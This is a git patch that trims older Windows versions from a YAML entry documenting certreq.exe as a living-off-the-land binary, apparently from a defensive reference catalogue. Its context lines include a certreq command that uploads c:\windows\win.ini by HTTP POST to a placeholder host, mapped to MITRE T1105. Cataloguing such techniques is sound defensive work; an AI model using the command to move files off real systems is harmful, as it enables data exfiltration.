From 74d010a893e413fe2fe4f0bebbc5f1b65147cc86 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sat, 25 Feb 2023 19:19:22 +0000 Subject: [PATCH] Removing pre-Windows 10 OSs from CertReq entry, fixes #247 --- yml/OSBinaries/Certreq.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index c713172..0396f6b 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows 10, Windows 11 - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST Usecase: Upload Category: Upload Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe